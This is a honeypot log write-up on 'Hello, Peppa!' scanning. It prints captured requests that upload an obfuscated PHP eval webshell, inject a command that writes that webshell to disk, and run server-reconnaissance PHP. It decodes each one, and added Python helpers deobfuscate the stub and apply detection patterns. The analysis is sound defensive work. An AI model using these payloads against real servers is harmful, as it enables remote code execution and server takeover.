Hello, Peppa! access logs


The mysterious "Hello, Peppa!" accesses - とりあえずブログ

This curious "Hello, Peppa!" access has also been hitting the WOWHoneypot I operate. There were several patterns, so I have pulled the relevant logs and present them here.

Log 1

POST /cmx.php HTTP/1.1
Host:  xxx.xxx.xxx.xxx
User-Agent: Go-http-client/1.1
Content-Length: 5433
Accept: */*
Content-Type: multipart/form-data; boundary=------------------------c7145c544564e14d

--------------------------c7145c544564e14d
Content-Disposition: form-data; name="_upl"

Upload
--------------------------c7145c544564e14d
Content-Disposition: form-data; name="h"

if (copy($_FILES[fileupload][tmp_name],$_FILES[fileupload][name])) echo OK; die();
--------------------------c7145c544564e14d
Content-Disposition: form-data; name="w"

if (copy($_FILES[fileupload][tmp_name],$_FILES[fileupload][name])) echo OK; die();
--------------------------c7145c544564e14d
Content-Disposition: form-data; name="leng"

if (copy($_FILES[fileupload][tmp_name],$_FILES[fileupload][name])) echo OK; die();
--------------------------c7145c544564e14d
Content-Disposition: form-data; name="a"

if (copy($_FILES[fileupload][tmp_name],$_FILES[fileupload][name])) echo OK; die();
--------------------------c7145c544564e14d
Content-Disposition: form-data; name="b"

if (copy($_FILES[fileupload][tmp_name],$_FILES[fileupload][name])) echo OK; die();
--------------------------c7145c544564e14d
Content-Disposition: form-data; name="c"

if (copy($_FILES[fileupload][tmp_name],$_FILES[fileupload][name])) echo OK; die();
--------------------------c7145c544564e14d
Content-Disposition: form-data; name="abc"

if (copy($_FILES[fileupload][tmp_name],$_FILES[fileupload][name])) echo OK; die();
--------------------------c7145c544564e14d
Content-Disposition: form-data; name="0"

if (copy($_FILES[fileupload][tmp_name],$_FILES[fileupload][name])) echo OK; die();
--------------------------c7145c544564e14d
Content-Disposition: form-data; name="cmd"

if (copy($_FILES[fileupload][tmp_name],$_FILES[fileupload][name])) echo OK; die();
--------------------------c7145c544564e14d
Content-Disposition: form-data; name="php"

if (copy($_FILES[fileupload][tmp_name],$_FILES[fileupload][name])) echo OK; die();
--------------------------c7145c544564e14d
Content-Disposition: form-data; name="1"

if (copy($_FILES[fileupload][tmp_name],$_FILES[fileupload][name])) echo OK; die();
--------------------------c7145c544564e14d
Content-Disposition: form-data; name="bbs"

if (copy($_FILES[fileupload][tmp_name],$_FILES[fileupload][name])) echo OK; die();
--------------------------c7145c544564e14d
Content-Disposition: form-data; name="m"

if (copy($_FILES[fileupload][tmp_name],$_FILES[fileupload][name])) echo OK; die();
--------------------------c7145c544564e14d
Content-Disposition: form-data; name="js"

if (copy($_FILES[fileupload][tmp_name],$_FILES[fileupload][name])) echo OK; die();
--------------------------c7145c544564e14d
Content-Disposition: form-data; name="2"

if (copy($_FILES[fileupload][tmp_name],$_FILES[fileupload][name])) echo OK; die();
--------------------------c7145c544564e14d
Content-Disposition: form-data; name="3"

if (copy($_FILES[fileupload][tmp_name],$_FILES[fileupload][name])) echo OK; die();
--------------------------c7145c544564e14d
Content-Disposition: form-data; name="!@#"

if (copy($_FILES[fileupload][tmp_name],$_FILES[fileupload][name])) echo OK; die();
--------------------------c7145c544564e14d
Content-Disposition: form-data; name="ae"

if (copy($_FILES[fileupload][tmp_name],$_FILES[fileupload][name])) echo OK; die();
--------------------------c7145c544564e14d
Content-Disposition: form-data; name="axa"

if (copy($_FILES[fileupload][tmp_name],$_FILES[fileupload][name])) echo OK; die();
--------------------------c7145c544564e14d
Content-Disposition: form-data; name="aaaa"

if (copy($_FILES[fileupload][tmp_name],$_FILES[fileupload][name])) echo OK; die();
--------------------------c7145c544564e14d
Content-Disposition: form-data; name="x"

if (copy($_FILES[fileupload][tmp_name],$_FILES[fileupload][name])) echo OK; die();
--------------------------c7145c544564e14d
Content-Disposition: form-data; name="xx"

if (copy($_FILES[fileupload][tmp_name],$_FILES[fileupload][name])) echo OK; die();
--------------------------c7145c544564e14d
Content-Disposition: form-data; name="eval"

if (copy($_FILES[fileupload][tmp_name],$_FILES[fileupload][name])) echo OK; die();
--------------------------c7145c544564e14d
Content-Disposition: form-data; name="file"; filename="E:\\PHPnow\\htdocs\\images.php"
Content-Type: application/octet-stream

<?php $func='c'.'r'.'e'.'a'.'t'.'e'.'_'.'f'.'u'.'n'.'c'.'t'.'i'.'o'.'n';$test=$func('$x','e'.'v'.'a'.'l'.'(b'.'a'.'s'.'e'.'6'.'4'.'_'.'d'.'e'.'c'.'o'.'d'.'e($x));');$test('c2Vzc2lvbl9zdGFydCgpOwppZihpc3NldCgkX1BPU1RbJ2NvZGUnXSkpewooc3Vic3RyKHNoYTEobWQ1KCRfUE9TVFsnYSddKSksMzYpPT0nMjIyZicpICYmICRfU0VTU0lPTlsndGhlQ29kZSddPXRyaW0oJF9QT1NUWydjb2RlJ10pOwp9CmlmKGlzc2V0KCRfU0VTU0lPTlsndGhlQ29kZSddKSl7CmV2YWwoYmFzZTY0X2RlY29kZSgkX1NFU1NJT05bJ3RoZUNvZGUnXSkpOwp9'); ?>Hello, Peppa!
--------------------------c7145c544564e14d
Content-Disposition: form-data; name="fileupload"; filename="E:\\PHPnow\\htdocs\\images.php"
Content-Type: application/octet-stream

<?php $func='c'.'r'.'e'.'a'.'t'.'e'.'_'.'f'.'u'.'n'.'c'.'t'.'i'.'o'.'n';$test=$func('$x','e'.'v'.'a'.'l'.'(b'.'a'.'s'.'e'.'6'.'4'.'_'.'d'.'e'.'c'.'o'.'d'.'e($x));');$test('c2Vzc2lvbl9zdGFydCgpOwppZihpc3NldCgkX1BPU1RbJ2NvZGUnXSkpewooc3Vic3RyKHNoYTEobWQ1KCRfUE9TVFsnYSddKSksMzYpPT0nMjIyZicpICYmICRfU0VTU0lPTlsndGhlQ29kZSddPXRyaW0oJF9QT1NUWydjb2RlJ10pOwp9CmlmKGlzc2V0KCRfU0VTU0lPTlsndGhlQ29kZSddKSl7CmV2YWwoYmFzZTY0X2RlY29kZSgkX1NFU1NJT05bJ3RoZUNvZGUnXSkpOwp9'); ?>Hello, Peppa!
--------------------------c7145c544564e14d--

multipart/form-data is the data format used for things such as file uploads. cmx.php appears to be a filename used for WebShells. (Reference: Honeypot Observation Record (36), "Attempt to create a WebShell targeting a phpMyAdmin misconfiguration", at www.morihi-soc.net)

Decoding the Base64-encoded portion gave the following.

session_start();
if(isset($_POST['code'])){
(substr(sha1(md5($_POST['a'])),36)=='222f') && $_SESSION['theCode']=trim($_POST['code']);
}
if(isset($_SESSION['theCode'])){
eval(base64_decode($_SESSION['theCode']));
}

Rather than the processing itself doing anything meaningful, this seems to be sorting hosts by whether or not the code can be executed, i.e. whether the vulnerability is present.
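As an added example (not part of the original post), the Python below undoes the 'c'.'r'.'e'... concatenation trick in the stub from Log 1, decodes the Base64 argument it passes to the generated function, and re-implements the stub's gate, substr(sha1(md5($_POST['a'])),36), so a candidate value of a can be checked against '222f'. The stub string is copied from the log above; the function and indicator names are my own.

```python
import base64
import hashlib
import re

# Stub copied from the Log 1 upload body above (the same string is written out by Log 3).
STUB = (
    "<?php $func='c'.'r'.'e'.'a'.'t'.'e'.'_'.'f'.'u'.'n'.'c'.'t'.'i'.'o'.'n';"
    "$test=$func('$x','e'.'v'.'a'.'l'.'(b'.'a'.'s'.'e'.'6'.'4'.'_'.'d'.'e'.'c'.'o'.'d'.'e($x));');"
    "$test('c2Vzc2lvbl9zdGFydCgpOwppZihpc3NldCgkX1BPU1RbJ2NvZGUnXSkpewooc3Vic3RyKHNoYTEobWQ1KCRfUE9TVFsnYSddKSksMzYpPT0nMjIyZicpICYmICRfU0VTU0lPTlsndGhlQ29kZSddPXRyaW0oJF9QT1NUWydjb2RlJ10pOwp9"
    "CmlmKGlzc2V0KCRfU0VTU0lPTlsndGhlQ29kZSddKSl7CmV2YWwoYmFzZTY0X2RlY29kZSgkX1NFU1NJT05bJ3RoZUNvZGUnXSkpOwp9'); ?>Hello, Peppa!"
)
CONCAT = re.compile(r"'([^']*)'\s*\.\s*'([^']*)'")              # 'a'.'b'  ->  'ab'
B64_ARG = re.compile(r"\(\s*'([A-Za-z0-9+/]{16,}={0,2})'\s*\)")  # f('base64...')


def collapse_concat(php: str) -> str:
    """Join single-quoted concatenation chains until stable, so hidden names become greppable."""
    prev = None
    while prev != php:
        prev, php = php, CONCAT.sub(r"'\1\2'", php)
    return php


def decode_b64_args(php: str) -> list:
    """Decode each long Base64 literal that is passed as a function's sole argument."""
    out = []
    for arg in B64_ARG.findall(php):
        try:
            out.append(base64.b64decode(arg + "=" * (-len(arg) % 4)).decode())
        except (ValueError, UnicodeDecodeError):
            continue
    return out


def gate_tag(a: str) -> str:
    """PHP's substr(sha1(md5($_POST['a'])),36) from the decoded stub; compare the result to '222f'."""
    return hashlib.sha1(hashlib.md5(a.encode()).hexdigest().encode()).hexdigest()[36:]


def analyse_stub(php: str) -> dict:
    """Deobfuscate the stub, decode its inner layer and report which indicators are present."""
    plain = collapse_concat(php)
    inner = decode_b64_args(plain)
    wanted = ("create_function", "eval(base64_decode", "$_SESSION", "Hello, Peppa!")
    return {
        "deobfuscated": plain,
        "inner": inner,
        "gated_eval": any("eval(base64_decode($_SESSION" in s for s in inner),
        "indicators": sorted(k for k in wanted if k in plain or any(k in s for s in inner)),
    }
```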

Log 2

POST /images.php HTTP/1.1
Host: xxx.xxx.xxx.xxx
Accept: */*
Content-Length: 956
Content-Type: application/x-www-form-urlencoded

a=just+for+fun&code=[...]%3D%3D

Is a=just+for+fun really just for fun, I wonder... As with Log 1, Base64-decoding the value of the code parameter gave the following result.

if (!function_exists('posix_getegid'))
{
    $user = @get_current_user();
    $uid = @getmyuid();
    $gid = @getmygid();
    $group = "?";
}
else
{
    $uid = @posix_getpwuid(@posix_geteuid());
    $gid = @posix_getgrgid(@posix_getegid());
    $uid = $uid['uid'];
    $user = $uid['name'];
    $gid = $gid['gid'];
    $group = $gid['name'];
}
echo "Hello, Peppa!|" . php_uname() ." + ". 'User:'.$uid.'('.$user.')/Group:'.$gid.'('.$group.')' ." + ".$_SERVER['SERVER_SOFTWARE'] ." + ". $_SERVER['DOCUMENT_ROOT'] ." + ". $_SERVER['SCRIPT_FILENAME'] . "|";
$self = substr($_SERVER['PHP_SELF'],strrpos($_SERVER['PHP_SELF'],'/')+1);
$time = @strtotime("2015-07-16 17:32:32");
��ho (@touch($self,$time,$time) ? 'success' : 'failed');

The last line got garbled for some reason, but it is probably "echo". It looks like an attempt to make the server print out various pieces of information about itself.

Log 3

GET /cmx.php?cmd=echo+%5E%3C%3Fphp+%24func%3D%27c%27.%27r%27.%27e%27.%27a%27.%27t%27.%27e%27.%27_%27.%27f%27.%27u%27.%27n%27.%27c%27.%27t%27.%27i%27.%27o%27.%27n%27%3B%24test%3D%24func%28%27%24x%27%2C%27e%27.%27v%27.%27a%27.%27l%27.%27%28b%27.%27a%27.%27s%27.%27e%27.%276%27.%274%27.%27_%27.%27d%27.%27e%27.%27c%27.%27o%27.%27d%27.%27e%28%24x%29%29%3B%27%29%3B%24test%28%27c2Vzc2lvbl9zdGFydCgpOwppZihpc3NldCgkX1BPU1RbJ2NvZGUnXSkpewooc3Vic3RyKHNoYTEobWQ1KCRfUE9TVFsnYSddKSksMzYpPT0nMjIyZicpICYmICRfU0VTU0lPTlsndGhlQ29kZSddPXRyaW0oJF9QT1NUWydjb2RlJ10pOwp9CmlmKGlzc2V0KCRfU0VTU0lPTlsndGhlQ29kZSddKSl7CmV2YWwoYmFzZTY0X2RlY29kZSgkX1NFU1NJT05bJ3RoZUNvZGUnXSkpOwp9%27%29%3B+%3F%5E%3E+%3Eimages.php+%26+echo+Hello%2C+Peppa%21 HTTP/1.1
Host: xxx.xxx.xxx.xxx
User-Agent: Go-http-client/1.1
Accept: */*

URL-decoded, it reads as follows.

echo ^<?php $func='c'.'r'.'e'.'a'.'t'.'e'.'_'.'f'.'u'.'n'.'c'.'t'.'i'.'o'.'n';$test=$func('$x','e'.'v'.'a'.'l'.'(b'.'a'.'s'.'e'.'6'.'4'.'_'.'d'.'e'.'c'.'o'.'d'.'e($x));');$test('c2Vzc2lvbl9zdGFydCgpOwppZihpc3NldCgkX1BPU1RbJ2NvZGUnXSkpewooc3Vic3RyKHNoYTEobWQ1KCRfUE9TVFsnYSddKSksMzYpPT0nMjIyZicpICYmICRfU0VTU0lPTlsndGhlQ29kZSddPXRyaW0oJF9QT1NUWydjb2RlJ10pOwp9CmlmKGlzc2V0KCRfU0VTU0lPTlsndGhlQ29kZSddKSl7CmV2YWwoYmFzZTY0X2RlY29kZSgkX1NFU1NJT05bJ3RoZUNvZGUnXSkpOwp9'); ?^> >images.php & echo Hello, Peppa!

The string inside $test is the same as the one in Log 1.

Log 4

POST /db_session.init.php HTTP/1.1
Host: xxx.xxx.xxx.xxx:80
User-Agent: Mozilla/5.0
Connection: Close
Content-Type: application/x-www-form-urlencoded
Content-Length: 48

eval=die('Hello, Peppa!'.(string)(111111111*9));

This one, too, does not seem to do anything particularly meaningful in itself.
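As an added example, not from the original post, the Python below runs a handful of pattern rules over the query string and URL-encoded body of a raw request, also looking inside Base64-valued parameters the way Log 2 hides its PHP (multipart bodies like Log 1 are out of scope here). The sample requests are constructed stand-ins modelled on Logs 2 to 4 with shortened payloads and placeholder hosts, and the rule tags are my own.

```python
import base64
import re
from urllib.parse import parse_qsl, quote_plus, urlsplit

# Constructed requests modelled on Logs 2 to 4 above (short stand-in payloads, not
# the captured ones) plus one benign request; "h" is a placeholder host.
CODE_B64 = quote_plus(base64.b64encode(b'echo "Hello, Peppa!|" . php_uname();').decode())
SAMPLES = {
    "log2": "POST /images.php HTTP/1.1\r\nHost: h\r\nContent-Type: application/x-www-form-urlencoded"
            "\r\n\r\na=just+for+fun&code=" + CODE_B64,
    "log3": "GET /cmx.php?cmd=echo+%5E%3C%3Fphp+eval%28base64_decode%28%24x%29%29%3B+%3F%5E%3E+"
            "%3Eimages.php+%26+echo+Hello%2C+Peppa%21 HTTP/1.1\r\nHost: h\r\nUser-Agent: Go-http-client/1.1\r\n\r\n",
    "log4": "POST /db_session.init.php HTTP/1.1\r\nHost: h\r\nContent-Type: application/x-www-form-urlencoded"
            "\r\n\r\neval=die('Hello, Peppa!'.(string)(111111111*9));",
    "benign": "POST /login.php HTTP/1.1\r\nHost: h\r\nContent-Type: application/x-www-form-urlencoded"
              "\r\n\r\nuser=alice&remember=1",
}
RULES = {  # tag -> pattern run over each decoded "name=value" (and its Base64-decoded form)
    "php-tag": re.compile(r"<\?php"),
    "eval-sink": re.compile(r"\b(eval|create_function|assert)\s*\("),
    "php-recon": re.compile(r"\b(php_uname|posix_get\w+|phpinfo)\s*\("),
    "file-write": re.compile(r"\$_FILES|>\s*\w+\.php\b|\bcopy\s*\("),
    "peppa-marker": re.compile(r"Hello, Peppa!"),
    "eval-param": re.compile(r"^(eval|cmd)="),
}
B64ISH = re.compile(r"^[A-Za-z0-9+/]{24,}={0,2}$")

def decoded_params(raw: str) -> list:
    """name=value strings from the query string and, if URL-encoded, the body."""
    head, _, body = raw.partition("\r\n\r\n")
    pairs = parse_qsl(urlsplit(head.split(" ", 2)[1]).query, keep_blank_values=True)
    if "application/x-www-form-urlencoded" in head.lower():
        pairs += parse_qsl(body, keep_blank_values=True)
    out = []
    for name, value in pairs:
        out.append(f"{name}={value}")
        if B64ISH.match(value):  # Log 2 style: the PHP sits inside a Base64 parameter
            try:
                out.append(name + "=" + base64.b64decode(value + "=" * (-len(value) % 4)).decode())
            except (ValueError, UnicodeDecodeError):
                continue
    return out

def triage_request(raw: str) -> set:
    """Return the rule tags that fire for one raw HTTP request (empty set: nothing matched)."""
    tags = set()
    for text in decoded_params(raw):
        tags.update(tag for tag, rx in RULES.items() if rx.search(text))
    return tags
```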

Looking at the WOWHoneypot logs, Hello, Peppa! has been observed since around May 4, but there is not much information about it online. The search hits that do exist are from May to June 2018, so perhaps it is some new scanner... I intend to keep watching the logs and gathering information.
